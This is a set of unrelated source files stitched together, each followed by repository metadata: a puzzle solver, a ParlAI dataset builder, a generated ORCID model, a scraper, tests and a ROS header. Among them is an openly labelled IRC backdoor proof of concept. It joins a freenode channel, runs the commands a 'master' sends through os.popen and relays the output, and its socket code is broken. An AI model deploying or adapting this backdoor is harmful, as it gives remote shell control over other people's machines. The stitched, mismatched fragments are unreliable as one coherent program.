(#*+!#@&+{_{&%&$}+}]!@*$#&&({(^(_#{+$*+_)}^&$##&+$]$(&$}!}!](%#+^]*$%]%)}^}])#_!
@)*%_$^]$@*&(()&+)_[*#@&{+&}^#*+*{[)[^$+#**^^(^]}][$_+]*&&)@}{&]](_]_]^&&}%@+}[$
(+[%*^!#)#+(}!)[!^{&[*[($%{+([#[[@&})$]@{^^#!$]_}!{*{*{![@$_@]+*{}[!#%@}]&#{*%{}
!!(}&+%%{%{%({!_(%_]@}+^%@_!*[&{)$%&)@]{+&_+%&^_}([_@@)$^!^}{#[$@{(_]{))*$(#!(+%
&!+]}]__^&@)^[}]!*#@)%!(%#)_*#}%*__}_+(**{[+)]%${+@^(]$()@([[{(]}$)}#!&+{%@$+{{^
&}_!$_+$_($*{!*#&$]%_)[({}+^}[@#+**%*}#[([@$][)[&+_%!!}@@}*!@%(#[}&$#]&{+^{#_*^]
@_%(]${&*&#^#_@^{%*^%$^+*(%}[!!)(!%_}!@@#&+)^^{##%&}$+*+!#}+%{%#)^@%[{}^%#+(+$[@
#%}+%%#_&}++)}{]%#]*)]+)]+^(*({}+}@_&&!![)^_$[][@*]!%@(@*+*_]{&}%*^)+[{!_%$+%[*+
&&&!#[_]])$}%[_*!)@}[{*]%!@!_))]*%#^{{+]%]]*@%{%@+^[@}(^#%&**+)*^*[)[)%$[^#@^&+#
+++}%_@@[(}[*%$#}^#+&}+%%)$+_{^(#%*{&*%(*)+([!@)*#[&!@(&_$@%$%]^^&{]@$}[({$((^}!
&%+{#_]{{{^[*_^#^!*@}_}*}+*&(@!^#%)@%[#(&$!&%)][#{*$${(+}($*(*(*&*$^{{@^]{]&*@!)
%&)**+]][!+@]*})(@)_]@{($!%+%%]_)(@{+!*__@[(%&&^]@([@[&%$+(}{{&]]+*}($+&}%(!%*@!
(^)${)%)]]$*!++[_(_($}(@++[^{]%{{!%#!%+*$)_&@&__#([__$[&^!}%$)(]}@+]+_@*]%%{&(@@
$_[(![!)+@[]][]($@%*(}$_(!^^)]^%){{(_#)*#][}$([)[]!_![![@}}}!%^^!}!*#%&{$&!#_!}#
[^{%{$^+@}&_}*_]%(}@*^}]^@*_^&&)^^}[}@]+^*%({*$^{+])_^%*#!${!#+$](+&]{@_+&[!()@{
@)[[){&(#[#{&@&(_]@##])}#&%*)_&!(}_^^$_)))}}}+&&$%&]}}$)![&{#_!(!![[![&(+{{++!}}
%}^%%#)))!}^)}%{*@*_{}*^{&(^+$}!@$_^}{$*^#)(@^]_@@%)@_[}&[)++)$&]+!}![#]@$%@]]!@
^()&++$(_[!^#[&@*@@(){#%@((!(%@(#[&+*%+(^%{{*$%#!(#^{(&*_}!^#%({*_#)%+#{$##{!$]*
{+_!{+^$!_&}%(]+}_}@**(&}(+@^%#+!#{#*@@{+!)}^{^+#(!&}[+*%+@}_+&+&]&+(+)_)((!{%*)
([)_+_[]&}}[{{+[)]!%{&&__&$+${_+#]_$}!&#%[@^^]!)#)_+#$]((*@+#$#)@[)*{[}(()$(@{*[
]}#*_+{)%[+!^{+{(&#_[_}_!{!*{[[)]][$[}*@[$*&))+$[&]@)[*}+^___%!]()^)&!@&[*@_+{}&
[{]$#{!^]^$#+*$}#*)(]!@^&#){][$)}!+%^)@#&!%(+^^($(%}^+[*)#+{%!))}(*&]__})][_))}#
())#&##{]$#$](&$%&&$)^{(@%)$%()#)&&*{]&^^+%$##%{!(_$(**&(_]+{%[%$!_){$*@@++]&^$(
@+{+&%]$)+@({$(+{!*#(%)]+[}){]]#)*[]%&{+)$){!&$]+^++_@]#%)[&&^%]#@#@)]@}%$[_*@%)
[&*^*})@(!{&^#!([%@_![{)+)$}_+)%&^#@#$$}))^&)}({+*&_()&@]$^#(&&{){)_[}{@(}#)!)%&
({+$[!#()[]%{$_*]*^%&]@{^@{)}}_^}@!^*)_[([{}]{*#{]&}}[$_[}!%%&_{{!$[}&[[@#[&_$()
*_$+)&}*){${}!]+%[{{!+)+{!&]$!}{_]&)!!^+){&*#{@!##_(^%^$([!+&+($&)##[&[^_{##{(**
{{)#*%@*[(^(}!%}@*}@+]^_}&&&}&{[$(@[#*+%[&%{$$**]]%(!$+$!]^+[^_(&*{#_^%[[#+{]#_[
*}]#)!%!_[})^%*@{!{$)*_+$$*}%(&]%^+$@!&{[]}**})}#}[#{%{$#@##(])&)((${^]^[%^&(!_&
{@((&@&)]!&{}@#])$($}#}@)#[+$^{%%&*]&_!+{$+[*{()_&&(}%[})}!}(}[!%@$#!*(^^![+(^@{
(+]]@{++#)@@%(!&_#@^$*%^)*](^}#]@]}]@++*^+$_+]^_][]@^#$^&!_+!(^+((&@^@_^@)$[#!)*
$)_#]*^{@_*[}@}*@@^+**+[[)**{!)!{##[(*}{)+@{}}{]+!*+&*&)_^&{*+@[*_#{)#(}_*]%{+!%
(}_%$#)^*&+[([@*!!{@*[{%@[__)&*&@{__+_}[_#{]!@*%(^&^_$_+[([(($@)])]))%_{(^@!{!#@
#*%%[#&#[+)%__]{++*)]}![[_%+__{${}%!}+!!)}*)_+!#%^}[!)[@[]@@_(@&&*]^_{+[)}@#{#*{
*%!%@{$%!_^+&]+@{$)!&_}_}&!}#)#[$&_&&_)*({({$[$)]]%#^{^%}}^%#]&+^}[!&_[[[(&{@+&^
_()%@#@{%_({${*!)(*+$*!!+$&&]{^^!(#}@[&@&[}^#)]+{)__@_[+]%$)]}$[([^{)%&)@[+]!_!+
_#$))}!+&&#(^[^(}%(%%$%+}{$^^)&^[@}#$]{!}+*}]{_}}*(*@]}#+{}@@!$(}])%+^!#@(_^(@[(
_#}$[^[@^+_&}*#$}%^)(#*}%_+]@_%]%&&()[^(}[*[}#@(%%$}]_)^(!#%]#@(#+!#{#$]^!}))_]*
]+%^+%))]+%$]+!%@[#@[@@[*#!+$#}}*#()$_*$[^}+)@#^^$(^+)^@%](!+)^[#!#_*{^^]&[_[_+}
$]%@^+!##}*(*)&([]+]##%$)+$_^%^@&((+@&)%}${#&$!!($#&^](^^{{(&+]_]@&*#_^+#!(}]$*&
_+@#[})]])[((#@&]!&]*&{*&#_[#(]{(}!]_+@[{^+{{!)*{!}]@@^#*{*({(%#(@@(]{%]!@@+%!!*
%(!{&^%%&$(!#@{+*#+*{]!%&)%*]*#$]()
]!{][@$}@)$__*_]}^(#*!#!_!**@{(&![]$_+_%^#_!%!$&@](!%%((%[#]&&}_{]+[+*##])(]%^(+
#(_}((]@}#$^_})%#&&((!^![^}+!}{$(%*{*$@%][)[[%&^[{](&+^*!!!([__[{^}&%+&^(*&])*$&
$#_}*!(+([_&%{^&[([%]}*^{{([@+@]@*&@_!]_+([(#&!]]#$$#]@#{_]][_{@]{*))$({%}_![@$]
#)+[])%]$+^^(}^!([&{)!#}#}}#!}[]]{[++&!)]#]]%^%_&_}!&&$@#&!#}&+]$)^_^*$]!$)}&{#)
+[+!_${^](+([&_%&$)#{$%#[%%][($()+!*_(*&!}%@}@%_#+%{%&*$]*{$(}}{)}]%))$}*^$]$(^^
!&*[^]]&#%&%!_+#&}_#}_]&^+@]%(!+!_*](@]}__+@%+^!&[@[)@(!*[%}^$!$(]!^_])!&_!!_[{*
(+*]_}%+(%[{)]({#[+$&&[^@{&#!@%)!+&}$@+@[+&_*!$(+#*%!+$@{{^**{)(]*$(}+(#+^}%@%^^
!$%}$$}+@^$$%{}{#!(%[]$!*}+(]!%{(^{&^{$[$)]&&^+{+%!#[([%^!{]]#^@!{#(&]@_$*_&!%(!
+_+}%@#{_}^#*)%*(*}*![}[%_[[^@$&%)([*{_${)$^^_!+}{)!)@_[*$_}*}$#[+}{]*+!^])}&{+#
+!@!^*@}!}&{]*#^@}_[)}#@%!_*#!$}!)[(${+^&!{[&&&*[{}+*+(#+_[}{$$)#([*!)%@^%_]#%$$
(++^+&)}*_&%@#[^^+^&@_%]+$%$#$*)@!(]*+@]}%$$}$(#$&^(%[*([&]*^&}(!#{&_}^(*{(+$#}}
(&_+][&_@)$&$&^[_$(++$^}]&^^*(+*!&#_$]*+@!]+{%^_*+!&}@$!#^{+_#([+@(((*+)[()__}(^
@)](+[$*_(]*$[[&@^(_*#(*&!^{+]_%)_)^[}@]#]%#@+^+[%{_*{!)}#$@#)_$!_(!*+#}%%}+$&$[
%&]!{{%*_!*}&)}$**_{*!#%[[#]!](^^$![#[[*}%(_#^^!%))!_^@)@**@}}(%%{#*%@(((]^%^![&
}!)$]&($)@](+(#{$)_%^%_^^#][{*[)%}+[##(##^{$}^]#&(&*{)%)&][&{]&#]}[[^^&[!#}${@_(
#@}&$[[%]_&$+)$!%{(}$^$}*
"""
import collections
hist = collections.defaultdict(int)
for c in mess:
hist[c] = 1 + hist.get(c, 0)
for c in mess:
if hist[c] < 10:
print(c, end="")
|
feliposz/python-challenge-solutions
|
level2-histogram.py
|
Python
|
mit
| 98,947
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Download and build the data if it does not exist.
import parlai.core.build_data as build_data
import gzip
import os
import re
from parlai.core.build_data import DownloadableFile
from parlai.utils.io import PathManager
RESOURCES = [
DownloadableFile(
'http://opus.lingfil.uu.se/download.php?f=OpenSubtitles/en.tar.gz',
'OpenSubtitles.tar.gz',
'aef6d57db36c221b8cff1cf2356309874c27ef6a36bb8ca714509b37d0db29bc',
)
]
def _regularize(sent):
sent = sent.replace('i>', '').replace('<', '').replace('>', '')
sent = re.sub(r'x[0-9|a-f][0-9|a-f]', ' ', sent)
sent = sent.replace('\\', '').replace('-', '')
sent = ' '.join(re.findall(r"[\w']+|[.,!?:;]", sent))
sent = sent.replace('. .', '...')
sent = ' '.join(sent.split())
return sent
def create_fb_format(inpath, outpath):
print('[building fbformat]')
with PathManager.open(
os.path.join(outpath, 'train.txt'), 'w'
) as ftrain, PathManager.open(
os.path.join(outpath, 'valid.txt'), 'w'
) as fvalid, PathManager.open(
os.path.join(outpath, 'test.txt'), 'w'
) as ftest:
conv_id = 0
# find all the files.
for root, _subfolder, files in os.walk(inpath):
for f in files:
if f.endswith('.gz'):
dialog = []
conv_id = conv_id + 1
with gzip.open(os.path.join(root, f), 'r') as f1:
words = []
line_id = 1
turn_id = 0
for line in f1:
line = str(line)
if line.find('<s id="') != -1:
# new sentence
if len(words) > 0:
curr_words = _regularize(''.join(words))
if len(curr_words) > 0:
if (turn_id % 2) == 0:
dialog.append(str(line_id))
dialog.append(' ')
dialog.append(curr_words)
else:
dialog.append('\t')
dialog.append(curr_words)
dialog.append('\n')
line_id += 1
turn_id += +1
words.clear()
else:
i1 = line.find('<w id="')
if i1 >= 0:
line = line[i1:]
word = line[line.find('>') + 1 : line.find('</w')]
words.append(' ')
words.append(word.replace('\t', ' '))
handle = ftrain
if (conv_id % 10) == 0:
handle = ftest
if (conv_id % 10) == 1:
handle = fvalid
dialog.append('\n')
handle.write(''.join(dialog))
def build(datapath):
dpath = os.path.join(datapath, 'OpenSubtitles')
version = '2'
if not build_data.built(dpath, version_string=version):
print('[building data: ' + dpath + ']')
if build_data.built(dpath):
# An older version exists, so remove these outdated files.
build_data.remove_dir(dpath)
build_data.make_dir(dpath)
# Download the data.
for downloadable_file in RESOURCES:
downloadable_file.download_file(dpath)
create_fb_format(os.path.join(dpath, 'OpenSubtitles', 'en'), dpath)
# Mark the data as built.
build_data.mark_done(dpath, version_string=version)
return dpath
|
facebookresearch/ParlAI
|
parlai/tasks/opensubtitles/build_2009.py
|
Python
|
mit
| 4,199
|
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.completion_date_v30 import CompletionDateV30 # noqa: F401,E501
from orcid_api_v3.models.deactivation_date_v30 import DeactivationDateV30 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30 import LastModifiedDateV30 # noqa: F401,E501
from orcid_api_v3.models.source_v30 import SourceV30 # noqa: F401,E501
from orcid_api_v3.models.submission_date_v30 import SubmissionDateV30 # noqa: F401,E501
class HistoryV30(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'creation_method': 'str',
'completion_date': 'CompletionDateV30',
'submission_date': 'SubmissionDateV30',
'last_modified_date': 'LastModifiedDateV30',
'claimed': 'bool',
'source': 'SourceV30',
'deactivation_date': 'DeactivationDateV30',
'verified_email': 'bool',
'verified_primary_email': 'bool'
}
attribute_map = {
'creation_method': 'creation-method',
'completion_date': 'completion-date',
'submission_date': 'submission-date',
'last_modified_date': 'last-modified-date',
'claimed': 'claimed',
'source': 'source',
'deactivation_date': 'deactivation-date',
'verified_email': 'verified-email',
'verified_primary_email': 'verified-primary-email'
}
def __init__(self, creation_method=None, completion_date=None, submission_date=None, last_modified_date=None, claimed=None, source=None, deactivation_date=None, verified_email=None, verified_primary_email=None): # noqa: E501
"""HistoryV30 - a model defined in Swagger""" # noqa: E501
self._creation_method = None
self._completion_date = None
self._submission_date = None
self._last_modified_date = None
self._claimed = None
self._source = None
self._deactivation_date = None
self._verified_email = None
self._verified_primary_email = None
self.discriminator = None
if creation_method is not None:
self.creation_method = creation_method
if completion_date is not None:
self.completion_date = completion_date
if submission_date is not None:
self.submission_date = submission_date
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if claimed is not None:
self.claimed = claimed
if source is not None:
self.source = source
if deactivation_date is not None:
self.deactivation_date = deactivation_date
if verified_email is not None:
self.verified_email = verified_email
if verified_primary_email is not None:
self.verified_primary_email = verified_primary_email
@property
def creation_method(self):
"""Gets the creation_method of this HistoryV30. # noqa: E501
:return: The creation_method of this HistoryV30. # noqa: E501
:rtype: str
"""
return self._creation_method
@creation_method.setter
def creation_method(self, creation_method):
"""Sets the creation_method of this HistoryV30.
:param creation_method: The creation_method of this HistoryV30. # noqa: E501
:type: str
"""
allowed_values = ["API", "DIRECT", "MEMBER_REFERRED", "WEBSITE", "INTEGRATION_TEST"] # noqa: E501
if creation_method not in allowed_values:
raise ValueError(
"Invalid value for `creation_method` ({0}), must be one of {1}" # noqa: E501
.format(creation_method, allowed_values)
)
self._creation_method = creation_method
@property
def completion_date(self):
"""Gets the completion_date of this HistoryV30. # noqa: E501
:return: The completion_date of this HistoryV30. # noqa: E501
:rtype: CompletionDateV30
"""
return self._completion_date
@completion_date.setter
def completion_date(self, completion_date):
"""Sets the completion_date of this HistoryV30.
:param completion_date: The completion_date of this HistoryV30. # noqa: E501
:type: CompletionDateV30
"""
self._completion_date = completion_date
@property
def submission_date(self):
"""Gets the submission_date of this HistoryV30. # noqa: E501
:return: The submission_date of this HistoryV30. # noqa: E501
:rtype: SubmissionDateV30
"""
return self._submission_date
@submission_date.setter
def submission_date(self, submission_date):
"""Sets the submission_date of this HistoryV30.
:param submission_date: The submission_date of this HistoryV30. # noqa: E501
:type: SubmissionDateV30
"""
self._submission_date = submission_date
@property
def last_modified_date(self):
"""Gets the last_modified_date of this HistoryV30. # noqa: E501
:return: The last_modified_date of this HistoryV30. # noqa: E501
:rtype: LastModifiedDateV30
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this HistoryV30.
:param last_modified_date: The last_modified_date of this HistoryV30. # noqa: E501
:type: LastModifiedDateV30
"""
self._last_modified_date = last_modified_date
@property
def claimed(self):
"""Gets the claimed of this HistoryV30. # noqa: E501
:return: The claimed of this HistoryV30. # noqa: E501
:rtype: bool
"""
return self._claimed
@claimed.setter
def claimed(self, claimed):
"""Sets the claimed of this HistoryV30.
:param claimed: The claimed of this HistoryV30. # noqa: E501
:type: bool
"""
self._claimed = claimed
@property
def source(self):
"""Gets the source of this HistoryV30. # noqa: E501
:return: The source of this HistoryV30. # noqa: E501
:rtype: SourceV30
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this HistoryV30.
:param source: The source of this HistoryV30. # noqa: E501
:type: SourceV30
"""
self._source = source
@property
def deactivation_date(self):
"""Gets the deactivation_date of this HistoryV30. # noqa: E501
:return: The deactivation_date of this HistoryV30. # noqa: E501
:rtype: DeactivationDateV30
"""
return self._deactivation_date
@deactivation_date.setter
def deactivation_date(self, deactivation_date):
"""Sets the deactivation_date of this HistoryV30.
:param deactivation_date: The deactivation_date of this HistoryV30. # noqa: E501
:type: DeactivationDateV30
"""
self._deactivation_date = deactivation_date
@property
def verified_email(self):
"""Gets the verified_email of this HistoryV30. # noqa: E501
:return: The verified_email of this HistoryV30. # noqa: E501
:rtype: bool
"""
return self._verified_email
@verified_email.setter
def verified_email(self, verified_email):
"""Sets the verified_email of this HistoryV30.
:param verified_email: The verified_email of this HistoryV30. # noqa: E501
:type: bool
"""
self._verified_email = verified_email
@property
def verified_primary_email(self):
"""Gets the verified_primary_email of this HistoryV30. # noqa: E501
:return: The verified_primary_email of this HistoryV30. # noqa: E501
:rtype: bool
"""
return self._verified_primary_email
@verified_primary_email.setter
def verified_primary_email(self, verified_primary_email):
"""Sets the verified_primary_email of this HistoryV30.
:param verified_primary_email: The verified_primary_email of this HistoryV30. # noqa: E501
:type: bool
"""
self._verified_primary_email = verified_primary_email
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(HistoryV30, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HistoryV30):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
Royal-Society-of-New-Zealand/NZ-ORCID-Hub
|
orcid_api_v3/models/history_v30.py
|
Python
|
mit
| 10,411
|
#!/usr/bin/env python
# -*- coding:utf-8 -*
import datetime
import requests
import re
import simplejson as json
class OWS(object):
def __init__(self):
super(OWS, self).__init__()
def calendar(self):
today = datetime.date.today()
imgUrl = 'http://img.owspace.com/Public/uploads/Download/%d/%02d%02d.jpg' % (
today.year, today.month, today.day)
try:
desc = self.ocr(imgUrl)
except:
desc = '__'
text = u'%s月%s日,%s。' % (today.month, today.day, desc)
item = {
'text': text,
'imgurl': imgUrl
}
return item
def ocr(self, imgUrl):
url = 'https://westus.api.cognitive.microsoft.com/vision/v1.0/ocr?language=zh-Hans'
headers = {
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': 'YOUR-SUBSCRIPTION-KEY',
}
payload = {'url': imgUrl}
resp = requests.post(url, headers=headers, data=json.dumps(payload))
data = resp.json()
_regions = []
for d in data['regions']:
_lines = []
for l in d['lines']:
_words = []
for w in l['words']:
_words.append(w['text'])
_lines.append(''.join(_words))
_regions.append('\n'.join(_lines))
content = '\n'.join(_regions)
pattern = ur'([宜忌]\S+)'
try:
desc = re.search(pattern, content).group(1).strip()
except:
desc = ''
return desc
if __name__ == '__main__':
o = OWS()
item = o.calendar()
msg = u'%s %s' % (
item['text'],
item['imgurl']
)
print msg
|
caspartse/mylittlebot
|
owsbot.py
|
Python
|
mit
| 1,734
|
# -*- coding: utf-8 -*-
import re
import os
import subprocess
# Regular expression used to match Python files
pyfile = re.compile('.py$')
# List of allowed example to fail
allowed_errors = (
'simulated_error.py'
)
def test_examples():
# List of file examples
examples = [f for f in os.listdir('examples') if pyfile.match(f)]
# Test file example
for example in examples:
code = subprocess.call(['python', 'examples/{}'.format(example)])
expected = 1 if example in allowed_errors else 0
if code != expected:
raise AssertionError('invalid exit code: {}'.format(example))
|
h2non/pook
|
tests/integration/examples_test.py
|
Python
|
mit
| 631
|
# -*- coding:utf-8 -*-
#20161029
import urllib
import urllib2
from bs4 import BeautifulSoup
import re
import os
#要爬取的网址
url = 'http://tieba.baidu.com/p/2511853162?pn=%s'
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36'}
#爬取网页
def url_request(u, h):
u_request = urllib2.Request(u,headers = h)
u_open = urllib2.urlopen(u_request,timeout=20)
return u_open.read()
#保存文件为txt
def savefile(fs, name):
with open(name+".txt", "a") as f:
f.write(fs)
"""
def url_catch():
pass
"""
#对每日一句的内容进行分析并保存
def every(n):
urlnew = url%str(n+1)
print urlnew
savefile(''.join(['\n',urlnew]),"tieba1")
a = url_request(urlnew, headers)
#print a
soup = BeautifulSoup(a,'html.parser')
b = soup.find_all("div",{"class":"d_post_content j_d_post_content "})
print len(b)
if len(b):
for i in b:
#print i.get_text()
savefile('\n'.join(["\n",i.get_text().encode("gb18030").strip()]),"tieba1")
else:pass
#大概有260个网页
for i in range(9):
every(i)
|
nanhuayu/hello-world
|
Python/WebCrawler/readforum/tieba.py
|
Python
|
mit
| 1,185
|
#!/usr/bin/env python3
# This is just a PoC, and it comes with no warranty or anything.
# Use it at your own risk. it MUST NOT be used in a production environment or anything other than testing.
# PLEASE respect other people's privacy. Only tested on Linux BTW
import asyncio
import os
from socket import AF_INET, SO_REUSEADDR, SOCK_STREAM, SOL_SOCKET, socket
import time
HOST = "chat.freenode.net" # You can change this to whatever you want
PORT = 6667
NICK = "Your Nick Name"
IDENT = "Your Identity"
REALNAME = "Your REAL Name"
MASTER = "The Master of this particular Slave"
CHANNEL = "The Channel To join"
readbuffer = ""
loop = asyncio.get_event_loop()
async def initiate_connection(address):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
sock.setblocking(False)
sock.send(bytes("NICK %s\r\n" % NICK, "UTF-8"))
sock.send(bytes("USER %s %s bla :%s\r\n" % (IDENT, HOST, REALNAME), "UTF-8"))
sock.send(bytes("JOIN #%s \r\n" % (CHANNEL), "UTF-8"))
sock.send(bytes("PRIVMSG %s :Hello Master :) Tell me commands to do \r\n" % MASTER, "UTF-8"))
while True:
client, addr = await loop.sock_accept(sock)
print('New command', addr)
loop.create_task(command_handler(client))
async def command_handler(client):
with client:
while True:
data = await loop.sock_recv(client, 10000)
if not data:
break
temp = str.split(data, "\n")
data = temp.pop()
for line in temp:
line = str.rstrip(line)
line = str.split(line)
if line[0] == "PING":
loop.sock_sendall(bytes("PONG %s\r\n" % line[1], "UTF-8"))
if line[1] == "PRIVMSG":
sender = ""
for char in line[0]:
if char == "!":
break
if char != ":":
sender += char
size = len(line)
i = 3
message = ""
while i < size:
message += line[i] + " "
i = i + 1
message.lstrip(":")
loop.sock_sendall(bytes("PRIVMSG %s :Executing-> %s \r\n" % (sender, message[1:]), "UTF-8"))
# Removing the first Char and sent it to shell
# response = os.system(message[1:])
p = os.popen(message[1:] + " 2>&1", "r")
# Puts out the first 20 lines. There's a good reason for this.
n = 0
while n < 20:
line = p.readline()
if not line:
break
loop.sock_sendall(bytes("PRIVMSG %s :Response -> %s \r\n" % (sender, str(line)), "UTF-8"))
time.sleep(1)
n += 1
for index, i in enumerate(line):
print(line[index])
print('Connection Closed!')
|
mosajjal/ircbackdoor
|
main_asyncio.py
|
Python
|
mit
| 3,169
|
from flask import Flask
from argparse import ArgumentParser
app = Flask(__name__, static_folder='static')
from server import start
from route import initialize
def main():
argparser = ArgumentParser()
argparser.add_argument('-P', '--port', default=8080, type=int)
argparser.add_argument('-H', '--host', default='0.0.0.0', type=str)
args = argparser.parse_args()
initialize()
start(port=args.port, host=args.host)
|
vasumv/pokemon_ai
|
pokemonitor/__init__.py
|
Python
|
mit
| 441
|
from .ujson import decode, encode, dump, dumps, load, loads # noqa: F401
|
explosion/srsly
|
srsly/ujson/__init__.py
|
Python
|
mit
| 74
|
"""
Premium Question
"""
import sys
__author__ = 'Daniel'
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def closestValue(self, root, target):
"""
Divide the problem into 2 parts:
1. find the value just smaller than target
2. find the value just larger than target
:type root: TreeNode
:type target: float
:rtype: int
"""
lo = [-sys.float_info.max]
self.find(root, target, lo, True)
hi = [sys.float_info.max]
self.find(root, target, hi, False)
if hi[0] - target < target - lo[0]:
return int(hi[0])
else:
return int(lo[0])
def find(self, root, target, ret, lower=True):
if not root:
return
if root.val == target:
ret[0] = root.val
return
if root.val < target:
if lower: ret[0] = max(ret[0], root.val)
self.find(root.right, target, ret, lower)
else:
if not lower: ret[0] = min(ret[0], root.val)
self.find(root.left, target, ret, lower)
if __name__ == "__main__":
assert Solution().closestValue(TreeNode(2147483647), 0.0) == 2147483647
|
algorhythms/LeetCode
|
270 Closest Binary Search Tree Value.py
|
Python
|
mit
| 1,307
|
from interactive import InteractiveModule, UserModule
from viewer import ViewerConstants
from screen import Screen
from viewport import Viewport
from state import State
from colon_line import ColonLine
from text_box import TextBox
import log
log = log.logger
class PC(InteractiveModule, UserModule):
def __init__(self):
super(PC, self).__init__()
def _handle_combo(self, viewer, buf):
pass
def _handle(self, viewer, ch):
screen = viewer.get_submodule(Screen)
viewport = viewer.get_submodule(Viewport)
state = viewer.get_submodule(State)
wsad = state.get_state("direction_scheme")
wsad = True if wsad is not None and wsad is True else False
if not wsad:
if ch == ord("j"):
self.down(viewer)
elif ch == ord("k"):
self.up(viewer)
elif ch == ord("h"):
self.left(viewer)
elif ch == ord("l"):
self.right(viewer)
elif ch == ord("J"):
self.vp_down(viewer)
elif ch == ord("K"):
self.vp_up(viewer)
elif ch == ord("H"):
self.vp_left(viewer)
elif ch == ord("L"):
self.vp_right(viewer)
else:
if ch == ord("s"):
self.down(viewer)
elif ch == ord("w"):
self.up(viewer)
elif ch == ord("a"):
self.left(viewer)
elif ch == ord("d"):
self.right(viewer)
elif ch == ord("S"):
self.vp_down(viewer)
elif ch == ord("W"):
self.vp_up(viewer)
elif ch == ord("A"):
self.vp_left(viewer)
elif ch == ord("D"):
self.vp_right(viewer)
def up(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_up()
def down(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_down()
def left(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_left()
def right(self, viewer):
vp = viewer.get_submodule(Viewport)
vp.cursor_right()
def vp_down(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.down()
cl.mark_dirty()
screen.fix_cursor()
def vp_up(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.up()
cl.mark_dirty()
screen.fix_cursor()
def vp_right(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.right()
cl.mark_dirty()
screen.fix_cursor()
def vp_left(self, viewer):
vp = viewer.get_submodule(Viewport)
screen = viewer.get_submodule(Screen)
cl = viewer.get_submodule(ColonLine)
vp.left()
cl.mark_dirty()
screen.fix_cursor()
|
jghibiki/Cursed
|
terminal/pc.py
|
Python
|
mit
| 3,187
|
#coding: utf-8
import requests
import json
import sys
import datetime
import os
from contextlib import closing
def all_sample_code():
'''
library.json来源于https://developer.apple.com/library/content/navigation/library.json
"columns": { "name" : 0,
"id" : 1,
"type" : 2,
"date" : 3,
"updateSize" : 4,
"topic" : 5,
"framework" : 6,
"release" : 7,
"subtopic" : 8,
"url" : 9,
"sortOrder" : 10,
"displayDate": 11,
"platform" : 12,
},
但是columns中platform后面多了一个逗号,不符合json,需要删掉。
'''
f = open('library.json', 'r+')
return json.loads(f.read(), strict=False)
def get_download_url(item):
name = item[9].split('/')[2]
book_url = 'https://developer.apple.com/library/content/samplecode/%s/book.json' % name
r = requests.get(url=book_url)
print book_url
download_url = 'https://developer.apple.com/library/content/samplecode/%s/%s' % (name ,r.json()['sampleCode'])
return download_url.encode("utf-8")
def download_file(url, path):
if not os.path.exists(path):
os.makedirs(path)
start = datetime.datetime.now().replace(microsecond=0)
filename = url.split('/')[-1]
filepath = os.path.join(path,filename)
with closing(requests.get(url, stream=True)) as response:
chunk_size = 1024 # 单次请求最大值
content_size = int(response.headers['content-length'])
with open(filepath, "wb") as file:
for data in response.iter_content(chunk_size=chunk_size):
file.write(data)
end = datetime.datetime.now().replace(microsecond=0)
print '%s下载完成,用时:%s' % (filename, end-start)
if __name__ == '__main__':
codes = all_sample_code()
for x in codes['documents']:
if x[2] == 5:
download_url = get_download_url(x)
print 'download url:', download_url
download_file(download_url, 'files')
|
LeoXu92/AppleSampleSpider
|
AppleSampleSpider.py
|
Python
|
mit
| 1,999
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
def chunked(fh, size):
'''
Chunks a file handle into block of the given size
'''
while True:
data = fh.read(size)
if data == "":
return
yield data
|
Saevon/Recipes
|
python/chunked.py
|
Python
|
mit
| 248
|
#!/usr/bin/env python
from __future__ import division
import copy
import threading
from subprocess import Popen
import time
import os
import sys
import numpy as np
import cv2
from cv_bridge import CvBridge, CvBridgeError
import matplotlib.pyplot as plt
import rospy
import rosparam
from sensor_msgs.msg import Image
from std_msgs.msg import Float32, Header, String
